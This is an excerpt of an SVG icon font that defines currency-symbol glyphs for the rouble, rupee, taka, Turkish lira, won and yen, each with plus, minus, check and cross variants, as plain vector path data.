<glyph glyph-name="rouble-minus" horiz-adv-x="1000" unicode="&#xea0c;" d="M780 148c-22 23-52 36-85 38h-5c-35 0-67-14-90-38-23-22-38-54-38-89 0-18 4-36 11-51 6-15 16-28 27-40 23-23 55-37 90-37 70 0 127 57 127 128 0 35-14 67-37 89z m-32-106h-117v33h117v-33z m-11 619c-17 33-40 59-68 78-28 19-59 32-94 39-34 6-69 10-102 10-33 0-65-1-96-3-32-2-64-4-95-6v-384h-94c-4-20-6-41-6-62 0-21 2-41 6-61h94v-87h-94c-4-20-6-40-6-62 0-20 2-40 6-60h94v-146c14-2 27-3 40-4 12 0 24-1 35-1 12 0 23 1 35 1 13 1 25 2 38 4v146h84c0 2 0 3 0 5 0 43 17 82 45 110 3 3 5 5 8 8h-137v86h1c33 0 106 2 146 12 34 8 65 20 93 39 28 19 50 45 68 78 17 33 26 77 26 130 0 53-9 96-27 130z m-136-194c-7-17-17-31-30-41-12-10-27-19-43-24-16-4-36-9-98-7v266c12 1 21 2 28 2 6 1 13 1 21 1 16 0 33-3 49-7 16-4 30-12 43-23 13-10 23-24 30-41 7-18 11-39 11-65 0-24-4-45-11-61z" />
<glyph glyph-name="rouble-plus" horiz-adv-x="1000" unicode="&#xea0d;" d="M780 148c-22 23-52 36-86 38h-4c-35 0-67-14-90-38-23-22-38-54-38-89 0-18 4-36 11-51 7-15 16-28 27-40 23-23 55-37 90-37 70 0 127 57 127 128 0 35-14 67-37 89z m-30-108h-42v-42h-37v42h-41v37h41v42h37v-42h42v-37z m-13 621c-17 33-40 59-68 78-28 19-59 32-94 39-34 6-69 10-102 10-33 0-65-1-96-3-32-2-64-4-95-6v-384h-94c-4-20-6-41-6-62 0-21 2-41 6-61h94v-87h-94c-4-20-6-40-6-62 0-20 2-40 6-60h94v-146c14-2 27-3 40-4 12 0 24-1 35-1 12 0 23 1 35 1 13 1 25 2 38 4v146h84c0 2 0 3 0 5 0 43 17 82 45 110 3 3 5 5 8 8h-137v86h1c33 0 106 2 146 12 34 8 65 20 93 39 28 19 50 45 68 78 17 33 26 77 26 130 0 53-9 96-27 130z m-136-194c-7-17-17-31-30-41-12-10-27-19-43-24-16-4-36-9-98-7v266c12 1 21 2 28 2s13 1 21 1c16 0 33-3 49-7 16-4 30-12 43-23 13-10 23-24 30-41 7-18 11-39 11-65 0-24-4-45-11-61z" />
<glyph glyph-name="rouble-true" horiz-adv-x="1000" unicode="&#xea0e;" d="M780 148c-22 23-52 36-85 38h-5c-35 0-67-14-90-38-23-22-38-54-38-89 0-18 4-36 11-51 6-15 16-28 27-40 23-23 55-37 90-37 70 0 127 57 127 128 0 35-14 67-37 89z m-24-60l-78-78c-2-2-5-2-7 0l-48 48c-2 2-2 5 0 7l12 12c2 2 5 2 7 0l33-33 62 63c2 2 6 2 8 0l11-11c2-2 2-6 0-8z m-19 573c-17 33-40 59-68 78-28 19-59 32-94 39-34 6-69 10-102 10-33 0-65-1-96-3-32-2-64-4-95-6v-384h-94c-4-20-6-41-6-62 0-21 2-41 6-61h94v-87h-94c-4-20-6-40-6-62 0-20 2-40 6-60h94v-146c14-2 27-3 40-4 12 0 24-1 35-1 12 0 23 1 35 1 13 1 25 2 38 4v146h84c0 2 0 3 0 5 0 43 17 82 45 110 3 3 5 5 8 8h-137v86h1c33 0 106 2 146 12 34 8 65 20 93 39 28 19 50 45 68 78 17 33 26 77 26 130 0 53-9 96-27 130z m-136-194c-7-17-17-31-30-41-12-10-27-19-43-24-16-4-36-9-98-7v266c12 1 21 2 28 2 6 1 13 1 21 1 16 0 33-3 49-7 16-4 30-12 43-23 13-10 23-24 30-41 7-18 11-39 11-65 0-24-4-45-11-61z" />
<glyph glyph-name="rouble" horiz-adv-x="1000" unicode="&#xea0f;" d="M612 186h-155v86h1c33 0 106 2 146 12 34 8 65 20 93 39 28 19 50 45 68 78 17 33 26 76 26 130 0 53-9 96-26 130s-41 59-69 78c-27 19-59 32-94 39-34 6-69 10-102 10-33 0-65-1-96-3-32-2-64-4-95-7v-383h-82v-1h-12c-4-19-6-40-6-61 0-21 2-41 6-61h95v-87h-95c-4-20-6-40-6-61 0-21 2-41 6-61h95v-146c13-2 26-3 39-4 13 0 25-1 35-1 12 0 23 1 36 1 12 1 24 2 37 4v146h314c4 20 6 40 6 62 0 20-2 41-6 61h-159z m-155 475c12 1 22 2 28 2s14 1 21 1c16 0 33-3 49-7 17-4 31-12 43-23 13-10 23-24 30-41 8-18 11-39 11-65 0-24-3-45-11-62-7-16-17-30-30-40-12-10-26-19-42-24-16-4-37-9-99-8v267z" />
<glyph glyph-name="rupee-false" horiz-adv-x="1000" unicode="&#xea10;" d="M797 147c-22 22-52 36-86 38h-5c-35 0-67-15-90-38-23-23-38-55-38-90 0-18 4-36 11-51 6-15 16-29 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-38-122l-21-21-32 32-31-32-22 21 32 32-32 32 22 21 31-32 32 32 21-21-32-32 32-32z m-30 570c3-17 5-34 5-51 0-18-2-35-5-52h-121c-10-60-37-108-82-146-44-37-102-60-174-68 48-50 108-117 180-202-1-7-1-13-1-20 0-62 33-115 83-144h-111c-7 0-12 3-16 8-129 152-233 270-314 355-4 4-6 8-6 14v79c0 5 2 10 6 13 4 4 9 6 15 6h70c56 0 100 9 134 27 34 18 56 44 65 78h-287c-3 17-5 34-5 52 0 17 2 34 5 51h79v0h199c-24 47-80 70-169 70h-109c-3 20-5 41-5 62 0 15 1 29 3 44v1l2 16h559c3-17 5-34 5-52 0-17-2-35-5-52h-163c19-25 33-54 40-89l123 0z" />
<glyph glyph-name="rupee-minus" horiz-adv-x="1000" unicode="&#xea11;" d="M797 147c-22 22-52 36-86 38h-5c-35 0-67-15-90-38-23-23-38-55-38-90 0-18 4-36 11-51 6-15 16-29 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-32-107h-118v34h118v-34z m-36 555c3-17 5-34 5-51 0-18-2-35-5-52h-121c-10-60-37-108-82-146-44-37-102-60-174-68 48-50 108-117 180-202-1-7-1-13-1-20 0-62 33-115 83-144h-111c-7 0-12 3-16 8-129 152-233 270-314 355-4 4-6 8-6 14v79c0 5 2 10 6 13 4 4 9 6 15 6h70c56 0 100 9 134 27 34 18 56 44 65 78h-287c-3 17-5 34-5 52 0 17 2 34 5 51h79v0h199c-24 47-80 70-169 70h-109c-3 20-5 41-5 62 0 15 1 29 3 44v1l2 16h559c3-17 5-34 5-52 0-17-2-35-5-52h-163c20-25 33-54 40-89l123 0z" />
<glyph glyph-name="rupee-plus" horiz-adv-x="1000" unicode="&#xea12;" d="M797 147c-22 22-53 36-86 38h-4c-36 0-68-15-91-38-23-23-38-55-38-90 0-18 4-36 11-51 7-15 16-29 27-40 23-23 55-37 91-37 70 0 128 57 128 128 0 35-15 67-38 90z m-30-109h-42v-42h-37v42h-42v37h42v42h37v-42h42v-37z m-38 557c3-17 5-34 5-51 0-18-2-35-5-52h-121c-10-60-37-108-82-146-44-37-102-60-174-68 48-50 108-117 180-202-1-7-1-13-1-20 0-62 33-115 83-144h-111c-7 0-12 3-16 8-129 152-233 270-314 355-4 4-6 8-6 14v79c0 5 2 10 6 13 4 4 9 6 15 6h70c56 0 100 9 134 27 34 18 56 44 65 78h-287c-3 17-5 34-5 52 0 17 2 34 5 51h79v0h199c-24 47-80 70-169 70h-109c-3 20-5 41-5 62 0 15 1 29 3 44v1l2 16h559c3-17 5-34 5-52 0-17-2-35-5-52h-163c20-25 33-54 40-89l123 0z" />
<glyph glyph-name="rupee-true" horiz-adv-x="1000" unicode="&#xea13;" d="M797 147c-22 22-52 36-86 38h-5c-35 0-67-15-90-38-23-23-38-55-38-90 0-18 4-36 11-51 6-15 16-29 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-14 67-37 90z m-24-60l-78-79c-2-2-6-2-8 0l-47 48c-3 2-3 6 0 7l11 12c2 2 6 2 7 0l33-33 63 63c2 3 6 3 8 0l11-11c2-2 2-6 0-7z m-44 508c3-17 5-34 5-51 0-18-2-35-5-52h-121c-10-60-37-108-82-146-44-37-102-60-174-68 48-50 108-117 180-202-1-7-1-13-1-20 0-62 33-115 83-144h-111c-7 0-12 3-16 8-129 152-233 270-314 355-4 4-6 8-6 14v79c0 5 2 10 6 13 4 4 9 6 15 6h70c56 0 100 9 134 27 34 18 56 44 65 78h-287c-3 17-5 34-5 52 0 17 2 34 5 51h79v0h199c-24 47-80 70-169 70h-109c-3 20-5 41-5 62 0 15 1 29 3 44v1l2 16h559c3-17 5-34 5-52 0-17-2-35-5-52h-163c20-25 33-54 40-89l123 0z" />
<glyph glyph-name="rupee" horiz-adv-x="1000" unicode="&#xea14;" d="M657 595c-7 34-21 64-40 89h163c3 17 5 34 5 52 0 18-2 35-5 52h-559c-1-6-2-11-2-16l-1-1c-1-15-2-29-2-44 0-21 1-42 5-62h109c89 0 145-23 169-70h-278c-3-17-5-34-5-51 0-18 1-36 5-52h214v0h73c-9-34-31-60-65-78-34-18-78-27-134-27h-71c-5 0-10-2-14-6s-6-8-6-14v-79c0-5 2-10 6-13 81-85 185-203 314-355 4-5 9-8 16-8h123c9 0 15 4 18 12 5 7 4 14-2 21-123 148-220 259-290 333 72 8 130 31 174 68 45 38 72 86 82 146h121c4 16 5 34 5 52 0 17-1 34-5 51h-123z" />
<glyph glyph-name="taka-false" horiz-adv-x="1000" unicode="&#xea15;" d="M902 135c-22 21-51 35-83 36h-5c-34 0-65-14-88-36-22-23-36-54-36-88 0-17 4-34 10-49 6-15 15-28 26-39 23-22 54-36 88-36 68 0 124 56 124 124 0 34-14 65-36 88z m-37-119l-21-20-30 31-31-31-20 20 30 31-30 31 20 20 31-30 30 30 21-20-31-31 31-31z m-113 197c-69-11-122-71-122-144 0-18 3-35 9-51-38-36-84-64-139-82-96-31-176-6-241 71-19 22-30 47-29 77 1 79 0 158 0 237v19c-25 0-48 0-72 1-7 0-16 3-22 9-24 24-47 49-74 76h168v163c0 24-8 41-22 53-5 4-12 7-12 7-1 0-7 1-10 2l-10 1-62 2c-4 20-6 40-6 61 0 21 2 42 6 62h87c6 0 13-1 19-1 23-4 42-16 57-34 22-27 34-56 40-88 1-10 2-19 2-29 2-59 1-119 1-178v-19c5-1 7-1 9-1 31 6 53-8 72-32 16-18 34-34 53-55h-134v-232c0-53 28-82 80-85 25-1 49 2 71 15 68 39 121 92 143 171 3 8 3 17 5 28h-28c-64 1-103 36-107 101-1 16-1 32 2 48 11 47 46 75 94 77 79 5 140-39 166-122 13-43 15-86 6-128z" />
<glyph glyph-name="taka-minus" horiz-adv-x="1000" unicode="&#xea16;" d="M901 133c-22 22-51 35-83 36h-5c-34 0-66-14-88-36-23-23-37-54-37-88 0-18 4-35 11-50 6-14 15-28 26-39 22-22 54-36 88-36 69 0 125 56 125 125 0 34-14 65-37 88z m-31-105h-115v33h115v-33z m-113 184c-70-11-123-72-123-145 0-19 3-36 9-52-38-36-84-64-140-82-97-31-178-6-243 72-19 22-30 46-29 77 2 79 1 159 1 238v20c-26 0-50-1-74 1-7 0-16 3-21 8-24 24-48 50-74 77h169v164c-1 24-9 42-23 54-5 4-12 6-12 6-1 1-7 2-10 2l-10 2-62 1c-4 21-6 41-6 62 0 21 2 42 6 62h87c6 0 13 0 19-1 24-3 43-15 58-34 22-26 34-56 40-88 1-10 2-20 2-29 2-60 1-120 1-180v-19c5 0 7-1 9-1 32 7 54-8 73-31 15-19 33-35 53-56h-135v-234c0-53 28-82 80-85 26-2 50 2 71 14 69 40 123 93 145 172 2 9 3 18 5 29h-28c-65 1-104 36-108 101-1 16-1 33 2 48 11 48 46 76 95 79 80 4 141-40 167-123 13-43 15-87 6-129z" />
<glyph glyph-name="taka-plus" horiz-adv-x="1000" unicode="&#xea17;" d="M901 133c-21 22-51 35-84 36h-4c-35 0-66-13-88-36-23-23-37-54-37-88 0-18 4-35 10-50 7-14 16-27 27-39 22-22 53-36 88-36 69 0 125 56 125 125 0 34-14 65-37 88z m-29-106h-41v-41h-36v41h-41v36h41v41h36v-41h41v-36z m-115 185c-70-11-123-72-123-145 0-18 3-36 9-51-38-37-85-65-140-83-96-31-178-5-243 72-19 22-30 47-29 78 2 79 1 158 1 237v20c-26 0-49 0-73 1-8 0-16 3-22 9-24 24-48 49-74 77h169v163c0 24-9 42-23 54-5 4-12 6-12 7-1 0-7 1-10 1l-10 2-62 2c-4 20-6 40-6 61 0 21 2 42 6 63h87c6 0 13-1 20-2 23-3 42-15 57-34 22-26 35-56 40-88 1-10 2-19 3-29 1-60 0-120 0-179v-20c5 0 7-1 9-1 32 7 54-8 73-31 15-19 34-35 54-56h-136v-234c0-53 28-82 80-85 26-2 50 2 71 14 69 40 123 93 145 172 2 9 3 18 5 29h-28c-65 1-104 37-108 101-1 16-1 33 2 49 11 47 46 75 94 78 81 4 142-40 168-123 13-43 15-87 6-129z" />
<glyph glyph-name="taka-true" horiz-adv-x="1000" unicode="&#xea18;" d="M902 135c-22 21-51 35-83 36h-5c-34 0-65-14-88-36-22-23-36-54-36-88 0-17 4-34 10-49 6-15 16-28 26-39 23-22 54-36 88-36 68 0 124 56 124 124 0 34-14 65-36 88z m-24-59l-76-76c-1-2-5-2-7 0l-46 46c-2 2-2 6 0 8l11 11c2 2 5 2 7 0l32-32 61 61c2 2 5 2 7 0l11-11c2-2 2-5 0-7z m-126 137c-69-11-122-71-122-144 0-18 3-35 9-51-38-36-84-64-139-82-96-31-176-6-241 71-19 22-30 47-29 77 1 79 0 158 0 237v19c-25 0-48 0-72 1-7 0-16 3-22 9-24 24-47 49-74 76h168v163c0 24-8 41-22 53-5 4-12 7-12 7-1 0-7 1-10 2l-10 1-62 2c-4 20-6 40-6 61 0 21 2 42 6 62h87c6 0 12-1 19-1 23-4 42-16 57-34 22-27 34-56 39-88 2-10 3-19 3-29 2-59 1-119 1-178v-19c5-1 7-1 9-1 31 6 53-8 72-32 15-18 34-34 53-55h-134v-232c0-53 28-82 80-85 25-1 49 2 71 15 68 39 121 92 143 171 3 8 3 17 5 28h-28c-64 1-103 36-107 101-1 16-1 32 2 48 11 47 46 75 94 77 79 5 140-39 166-122 13-43 15-86 6-128z" />
<glyph glyph-name="taka" horiz-adv-x="1000" unicode="&#xea19;" d="M844 341c-26 84-88 130-170 125-49-3-85-32-95-80-4-15-5-32-3-49 4-66 43-102 109-103 10 0 19 0 29 0-2-11-2-20-5-29-23-80-77-135-147-175-22-13-47-16-72-15-54 4-82 33-82 87 0 73 0 147 0 220v18h138c-20 21-39 38-55 57-19 24-42 39-74 32-2 0-4 0-9 1v20c0 60 1 121-1 182 0 10-1 20-3 29-5 33-17 64-40 91-15 18-35 31-59 34-6 1-13 2-19 2h-89c-4-21-6-42-6-64 0-21 2-42 6-63l63-2 11-1c2-1 8-2 9-2 1 0 8-2 13-7 14-12 23-30 23-54 0-38 0-76 0-114v-53h-172c27-28 51-54 76-78 5-6 14-9 22-9 24-1 48-1 74-1v-20c0-81 1-162-1-242 0-32 11-56 30-79 66-79 149-105 247-73 121 39 198 125 245 239 23 57 25 117 7 176z" />
<glyph glyph-name="turkish-lira-false" horiz-adv-x="1000" unicode="&#xea1a;" d="M874 353c-23 22-53 36-87 38h-5c-35 0-68-15-91-38-23-23-38-56-38-91 0-19 4-36 11-52 6-15 16-28 27-40 23-23 56-37 91-37 72 0 129 57 129 129 0 35-14 68-37 91z m-38-123l-22-22-32 32-32-32-21 22 32 32-32 32 21 21 32-32 32 32 22-21-32-32 32-32z m-74-135c-6-8-12-16-18-24-68-85-157-137-263-153-45-7-91-4-137-5-7-1-15 0-22 0-17 0-24 6-25 24 0 35 0 70 0 104v259l-208-64 26 138 180 56c2 3 2 8 2 17l0 32c0 1-1 2-1 3l-179-55 27 138 152 47v171c12 2 24 3 36 4 11 0 22 1 33 1 11 0 23-1 34-1 11-1 23-2 36-4v-128l261 80-22-136-236-73c-3-3-5-8-4-15 1-12 0-25 0-39l233 72-22-136-211-66c0 0 0-1 0-2 0-93 0-187 0-281 0-2 0-3 1-8 18 3 36 4 53 10 65 20 116 53 153 100 27-38 71-64 121-66z" />
<glyph glyph-name="turkish-lira-minus" horiz-adv-x="1000" unicode="&#xea1b;" d="M874 353c-23 22-53 36-87 38h-5c-35 0-68-15-91-38-23-23-38-56-38-91 0-19 4-36 11-52 6-15 16-28 27-40 23-23 56-37 91-37 72 0 129 57 129 129 0 35-14 68-37 91z m-32-108h-119v34h119v-34z m-80-150c-6-8-12-16-18-24-68-85-157-137-263-153-45-7-91-4-137-5-7-1-15 0-22 0-17 0-24 6-25 24 0 35 0 70 0 104v259l-208-64 26 138 180 56c2 3 2 8 2 17l0 32c0 1-1 2-1 3l-179-55 27 138 152 47v171c12 2 24 3 36 4 11 0 22 1 33 1 11 0 23-1 34-1 11-1 23-2 36-4v-128l261 80-22-136-236-73c-3-3-5-8-4-15 1-12 0-25 0-39l233 72-22-136-211-66c0 0 0-1 0-2 0-93 0-187 0-281 0-2 0-3 1-8 18 3 36 4 53 10 65 20 116 53 153 100 27-38 71-64 121-66z" />
<glyph glyph-name="turkish-lira-plus" horiz-adv-x="1000" unicode="&#xea1c;" d="M874 353c-23 22-53 36-87 38h-4c-36 0-68-15-92-38-23-23-38-56-38-91 0-19 4-36 11-52 7-15 16-28 27-40 24-23 56-37 92-37 71 0 129 57 129 129 0 35-15 68-38 91z m-30-110h-43v-42h-37v42h-43v38h43v42h37v-42h42l1-38z m-82-148c-6-8-12-16-18-24-68-85-157-137-263-153-45-7-91-4-137-5-7-1-15 0-22 0-17 0-24 6-25 24 0 35 0 70 0 104v259l-208-64 26 138 180 56c2 3 2 8 2 17l0 32c0 1-1 2-1 3l-178-55 26 138 152 47v171c12 2 24 3 36 4 11 0 22 1 33 1 11 0 23-1 34-1 11-1 23-2 36-4v-128l261 80-22-136-236-73c-3-3-5-8-4-15 1-12 0-25 0-39l233 72-22-136-211-66c0 0 0-1 0-2 0-93 0-187 0-281 0-2 0-3 1-8 18 3 36 4 53 10 65 20 116 53 153 100 27-38 71-64 121-66z" />
<glyph glyph-name="turkish-lira-true" horiz-adv-x="1000" unicode="&#xea1d;" d="M874 353c-23 22-53 36-87 38h-5c-35 0-68-15-91-38-23-23-38-56-38-91 0-19 4-36 11-52 6-15 16-28 27-40 23-23 56-37 91-37 72 0 129 57 129 129 0 35-14 68-37 91z m-24-61l-79-79c-2-3-6-3-8 0l-48 48c-2 2-2 6 0 8l12 11c1 2 5 2 7 0l33-33 63 64c3 2 6 2 8 0l12-12c2-2 2-5 0-7z m-88-197c-6-8-12-16-18-24-68-85-157-137-263-153-45-7-91-4-137-5-7-1-15 0-22 0-17 0-24 6-25 24 0 35 0 70 0 104v259l-208-64 26 138 180 56c2 3 2 8 2 17l0 32c0 1-1 2-1 3l-179-55 27 138 152 47v171c12 2 24 3 36 4 11 0 22 1 33 1 11 0 23-1 34-1 11-1 23-2 36-4v-128l261 80-22-136-236-73c-3-3-5-8-4-15 1-12 0-25 0-39l233 72-22-136-211-66c0 0 0-1 0-2 0-93 0-187 0-281 0-2 0-3 1-8 18 3 36 4 53 10 65 20 116 53 153 100 27-38 71-64 121-66z" />
<glyph glyph-name="turkish-lira" horiz-adv-x="1000" unicode="&#xea1e;" d="M743 342c0-8-5-32-6-39-22-125-94-205-214-242-16-5-34-7-53-10 0 5 0 7 0 9 0 93 0 187-1 281 0 1 1 1 1 2l211 65 22 136-233-72c0 14 0 27-1 39 0 7 1 12 5 15l236 73 21 136-261-80v128c-12 2-24 3-36 4-11 0-22 1-33 1-11 0-22-1-34-1-11-1-23-2-35-4v-171l-152-47-27-138 179 55c0-2 1-2 1-3 0-11 0-21 0-32 0-9 0-14-2-17l-180-56-26-138 208 65v-260c0-34 0-69 0-104 0-18 7-24 25-24 7 0 14-1 22-1 45 2 92 0 137 6 106 16 194 68 263 153 60 74 92 159 96 254l-133 17z" />
<glyph glyph-name="won-false" horiz-adv-x="1000" unicode="&#xea1f;" d="M909 245c-18 17-41 28-67 29h-3c-28 0-52-11-70-29-18-18-29-43-29-70 0-14 3-27 8-39 5-12 12-22 21-31 18-18 42-29 70-29 55 0 99 44 99 99 0 27-11 52-29 70z m-30-95l-16-16-24 25-25-25-16 16 24 25-24 24 16 17 25-25 24 25 16-17-24-24 24-25z m-16 238h-69l69 294c-11 2-22 3-33 4-12 2-23 2-35 2-20 0-39-2-58-6l-53-294h-89l-66 294c-21 4-41 6-59 6-11 0-21 0-31-1-10-1-21-3-33-5l-66-294h-84l-54 294c-11 3-22 4-33 5-11 1-22 1-33 1-27 0-52-2-74-6l69-294h-67c-1-10-1-19-1-30 0-9 0-19 1-29h80l9-38h-89c-1-9-1-19-1-29 0-10 0-20 1-29h102l50-216c22-4 42-5 60-5 14 0 26 0 37 2 11 1 23 2 38 3l54 216h110l51-216c27-3 52-5 74-5 24 0 46 2 68 5l20 88c-15 20-25 46-25 74 0 49 28 92 69 112h-1l9 38h83c1 10 1 20 1 30 0 10-1 19-1 29z m-569-206l-9 51h21l-12-51z m25 109h-45l-7 38h60l-8-38z m143 169l17-72h-35l18 72z m-42-169l9 38h64l9-38h-82z m225-122l-15 64h26l-11-64z m22 122h-50l-9 38h66l-7-38z" />
<glyph glyph-name="won-minus" horiz-adv-x="1000" unicode="&#xea20;" d="M909 245c-18 17-41 28-67 29h-3c-28 0-52-11-70-29-18-18-29-43-29-70 0-14 3-27 8-39 5-12 12-22 21-31 18-18 42-29 70-29 55 0 99 44 99 99 0 27-11 52-29 70z m-25-83h-91v26h91v-26z m-21 226h-69l69 294c-11 2-22 3-33 4-12 2-23 2-35 2-20 0-39-2-58-6l-53-294h-89l-66 294c-21 4-41 6-59 6-11 0-21 0-31-1-10-1-21-3-33-5l-66-294h-84l-54 294c-11 3-22 4-33 5-11 1-22 1-33 1-27 0-52-2-74-6l69-294h-67c-1-10-1-19-1-30 0-9 0-19 1-29h80l9-38h-89c-1-9-1-19-1-29 0-10 0-20 1-29h102l50-216c22-4 42-5 60-5 14 0 26 0 37 2 11 1 23 2 38 3l54 216h110l51-216c27-3 52-5 74-5 24 0 46 2 68 5l20 88c-15 20-25 46-25 74 0 49 28 92 69 112h-1l9 38h83c1 10 1 20 1 30 0 10-1 19-1 29z m-569-206l-9 51h21l-12-51z m25 109h-45l-7 38h60l-8-38z m143 169l17-72h-35l18 72z m-42-169l9 38h64l9-38h-82z m225-122l-15 64h26l-11-64z m22 122h-50l-9 38h66l-7-38z" />
<glyph glyph-name="won-plus" horiz-adv-x="1000" unicode="&#xea21;" d="M908 245c-17 17-40 28-66 29h-3c-28 0-52-11-70-29-18-18-29-43-29-70 0-14 3-27 8-39 5-12 12-22 20-31 18-18 43-29 71-29 54 0 98 44 98 99 1 27-10 52-29 70z m-23-85h-32v-32h-29v32h-32v29h32v33h29v-33h32v-29z m-22 228h-69l69 294c-11 2-22 3-33 4-12 1-23 2-35 2-20 0-39-2-58-6l-53-294h-89l-66 294c-21 4-41 6-59 6-10 0-21 0-31-1-10-1-21-3-33-5l-66-294h-84l-54 294c-11 3-22 4-33 5-11 1-22 1-33 1-28 0-52-2-74-6l69-294h-67c-1-10-1-19-1-30 0-9 0-19 1-29h80l9-38h-89c-1-9-1-19-1-29 0-10 0-20 1-29h102l50-216c22-3 42-5 60-5 14 0 26 0 37 2 11 1 23 2 38 3l54 216h110l51-215c26-4 51-6 74-6 23 0 46 2 67 6l21 87c-16 21-25 46-25 74 0 49 28 92 69 112h-1l9 39h82c1 9 1 19 1 29 1 10 0 19 0 29z m-569-206l-9 51h20l-11-51z m25 109h-45l-7 38h60l-8-38z m143 169l17-72h-35l18 72z m-42-169l9 38h64l9-38h-82z m225-122l-15 64h26l-11-64z m22 122h-50l-9 38h65l-6-38z" />
<glyph glyph-name="won-true" horiz-adv-x="1000" unicode="&#xea22;" d="M909 245c-17 17-41 28-67 29h-3c-28 0-52-11-70-29-18-18-29-43-29-70 0-14 3-27 8-39 5-12 12-22 21-31 18-18 42-29 70-29 54 0 98 44 98 99 1 27-10 52-28 70z m-19-47l-60-61c-2-1-5-1-6 0l-37 37c-2 2-2 5 0 6l9 9c1 2 4 2 6 0l25-25 49 49c1 1 4 1 6 0l8-9c2-2 2-5 0-6z m-27 190h-69l69 294c-11 2-22 3-33 4-12 1-23 2-35 2-20 0-39-2-58-6l-53-294h-89l-66 294c-21 4-41 6-59 6-10 0-21 0-31-1-10-1-21-3-33-5l-66-294h-83l-55 294c-11 3-22 4-33 5-11 1-22 1-33 1-27 0-52-2-73-6l68-294h-67c-1-10-1-19-1-30 0-10 0-19 1-29h80l9-38h-89c-1-10-1-19-1-29 0-10 0-20 1-30h102l50-215c22-4 42-6 60-6 14 0 26 1 37 2 11 1 23 3 38 4l54 216h110l51-216c26-4 51-5 74-5 23 0 46 1 67 5l21 87c-16 21-25 47-25 75 0 49 28 91 69 112h-1l9 38h82c1 10 1 20 1 30 1 10 0 19 0 29z m-569-206l-9 51h21l-12-51z m25 109h-45l-7 38h60l-8-38z m143 169l17-72h-35l18 72z m-42-169l9 38h64l9-38h-82z m225-122l-15 64h26l-11-64z m22 122h-50l-9 38h66l-7-38z" />
<glyph glyph-name="won" horiz-adv-x="1000" unicode="&#xea23;" d="M901 286h-64l10 42h89c1 10 2 21 2 32 0 10-1 21-2 31h-75l76 322c-12 1-24 3-37 4-12 1-25 2-38 2-21 0-42-2-63-6l-58-322h-97l-72 322c-23 4-44 6-64 6-12 0-23 0-34-1-11-1-23-3-37-5l-71-322h-92l-59 322c-12 3-24 5-36 5-12 1-24 1-36 1-30 0-57-2-80-6l74-322h-73c-1-10-1-21-1-32 0-10 0-21 1-31h88l9-42h-97c-1-10-1-21-1-32 0-11 0-21 1-32h112l54-235c24-4 46-6 66-6 14 0 28 0 40 2 12 1 26 2 41 4l59 235h121l55-235c29-4 56-6 81-6 26 0 50 2 74 6l55 235h114c1 11 1 21 1 32 0 11 0 22-1 32l-35 0z m-231 42h60l-8-42h-54l-9 42h11z m-152 63h-39l20 80 19-80z m-223-63h56l-9-42h-48l-8 42h9z m10-106h23l-12-55-11 55z m222 64h-75l11 42h69l10-42h-15z m155-64h29l-13-70-16 70z" />
<glyph glyph-name="yen-false" horiz-adv-x="1000" unicode="&#xea24;" d="M844 166c-22 22-52 36-85 38h-5c-35 0-67-15-90-38-24-23-38-55-38-90 0-18 4-35 11-51 6-15 15-28 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-15 67-38 90z m-37-122l-21-21-32 32-32-32-21 21 32 32-32 31 21 21 32-31 32 31 21-21-32-31 32-32z m-184 358l208 378c-34 5-66 8-95 8-33 0-64-3-95-8l-161-339-164 339c-31 5-62 8-94 8-35 0-69-3-104-8l208-378h-147c-2-7-3-15-4-24-1-9-1-19-1-28 0-11 0-21 1-30 1-9 2-16 4-21h206v-86h-206c-2-6-3-14-4-23-1-10-1-19-1-29 0-11 0-20 1-29 1-9 2-17 4-22h206v-191c15-3 31-5 45-5 15-1 30-1 44-1 15 0 29 0 44 1 14 0 30 2 46 5v191h26c5 44 30 81 65 103h-91v85h227c2 7 3 15 3 25 1 9 1 19 1 30 0 21-1 37-4 49h-168z" />
<glyph glyph-name="yen-minus" horiz-adv-x="1000" unicode="&#xea25;" d="M844 166c-22 22-52 36-85 38h-5c-35 0-67-15-90-38-24-23-38-55-38-90 0-18 4-35 11-51 6-15 15-28 27-40 23-23 55-37 90-37 71 0 128 57 128 128 0 35-15 67-38 90z m-31-107h-118v34h118v-34z m-190 343l208 378c-34 5-66 8-95 8-33 0-64-3-95-8l-161-339-164 339c-31 5-62 8-94 8-35 0-69-3-104-8l208-378h-147c-2-7-3-15-4-24-1-9-1-19-1-28 0-11 0-21 1-30 1-9 2-16 4-21h206v-86h-206c-2-6-3-14-4-23-1-10-1-19-1-29 0-11 0-20 1-29 1-9 2-17 4-22h206v-191c15-3 31-5 45-5 15-1 30-1 44-1 15 0 29 0 44 1 14 0 30 2 46 5v191h26c5 44 30 81 65 103h-91v85h227c2 7 3 15 3 25 1 9 1 19 1 30 0 21-1 37-4 49l-168 0z" />
<glyph glyph-name="yen-plus" horiz-adv-x="1000" unicode="&#xea26;" d="M844 166c-22 22-52 36-86 38h-4c-36 0-67-15-91-38-23-23-37-55-37-90 0-18 4-35 10-51 7-15 16-28 27-40 24-23 55-37 91-37 70 0 128 57 128 128 0 35-15 67-38 90z m-30-109h-42v-42h-37v42h-42v38h42v41h37v-41h42v-38z m-191 345l208 378c-34 5-66 8-95 8-33 0-64-3-95-8l-161-339-164 339c-31 5-62 8-94 8-35 0-69-3-104-8l208-378h-147c-2-7-3-15-4-24-1-9-1-19-1-28 0-11 0-21 1-30 1-9 2-16 4-21h206v-86h-206c-2-6-3-14-4-23-1-10-1-19-1-29 0-11 0-20 1-29 1-9 2-17 4-22h206v-191c15-3 31-5 46-5 14-1 29-1 43-1 15 0 29 0 44 1 14 0 30 2 46 5v191h26c5 44 30 81 66 103h-92v85h227c2 7 3 15 3 25 1 9 1 19 1 30 0 21-1 37-4 49l-168 0z" />
